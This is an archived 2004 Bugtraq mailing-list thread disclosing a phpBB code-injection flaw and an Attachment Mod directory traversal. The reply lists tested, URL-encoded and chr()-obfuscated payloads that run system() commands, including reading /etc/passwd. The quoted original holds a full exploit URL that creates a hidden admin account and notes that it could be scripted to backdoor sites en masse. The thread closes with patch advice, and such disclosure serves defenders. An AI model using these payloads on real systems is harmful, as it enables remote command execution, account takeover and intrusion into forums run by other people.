lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: ntx0f at seteuid.com (ntx0f)
Subject: Re: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal

Instead of just injecting mysql commands you can use system(); to virtually
execute any command you want.

here's some examples i've already tested :

system(ls -l);
--------------
%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108))
%252echr(59)%252e%2527

system(uname -a);
-----------------
%2527%252esystem(chr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)
%252echr(32)%252echr(45)%252echr(97))%252echr(59)%252e%2527

system(id);
-----------
%2527%252esystem(chr(105)%252echr(100))%252echr(59)%252e%2527

system(/bin/cat /etc/passwd);
-----------------------------
%2527%252esystem(chr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%2
52echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(101)%252
echr(116)%252echr(99)%252echr(47)%252echr(112)%252echr(97)%252echr(115)%252e
chr(115)%252echr(119)%252echr(100))%252echr(59)%252e%2527

with the wrong permissions set someone exploiting this vulnerability would
be able to overwrite anything.

----- Original Message -----
From: <zee@...bnc.it>
To: <bugtraq@...urityfocus.com>
Sent: Friday, November 26, 2004 2:23 PM
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal


> Phpbb: All vulnerable all except 2.0.11
> Attachment module: All version vulnerable
>
> Howdark update opened wide my eyes with his nice exploit:
>
> Bugtraq id: 10701
>
>  -----
> viewtopic.php?t=1&highlight=%2527
>  -----
>
> Looking at the code I saw that was possible inject any type of Sql query
> with a multiple char() functions.
>
> The following code can add an username with admin rights executing this
> query:
>
> INSERT INTO
> phpbb_users(user_id,user_active,username,user_password,user_level) VALUES
> ('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')
>
> And will be added to phpbb_users a new user with admin rights.
>
> *Note we can only execute a working query if we know the tables name. If
not
> we can't. So this work only with a standard installation (usually 95% of
> websites ;-)
>
> username: ze3lock
> pass: thepass
>
> The exploit can be run without being logged in and then you can have
access
> with username. So it's quite simple to make it part of a script that could
> make backdoors around the web.
>
> For make it working just use the id of a working thread (in this case the
> thread is 30 - you can see it from the message)
>
>  --- Code start ----
>
>
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr
>
(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)
>
%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25
>
2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252
>
echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25
>
2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2
>
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2
>
52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2
>
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%
>
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%
>
252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%
>
252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)
>
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108
> )%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(
32
> )%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%
25
>
2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech
>
r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39
> )%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(10
8)
>
%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2
>
52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec
>
hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr
>
(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98
> )%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%
25
>
2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec
>
hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(
> 41))%252e%2527
>
>  --- code end ---
>
>  ------------ Attach Module ----------------
>
>
> In the attach module, I found a directory traversal in the "UPLOAD_DIR"
> field.
>
> This is the directory where all attachments are supposted to be uploaded.
>
> The field accept any kind of character so you can put instead of 'files'
> '../../' and all the attachments will be uploaded in the '../..?
directory.
>
> That's really dangerous for defacements threat.
>
>
>  --------------- Suggestion ------------------
>
> Please, upgrade to version 2.0.11 and add an input validation to
UPLOAD_DIR
> field in attach module.
>
> Zeelock
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ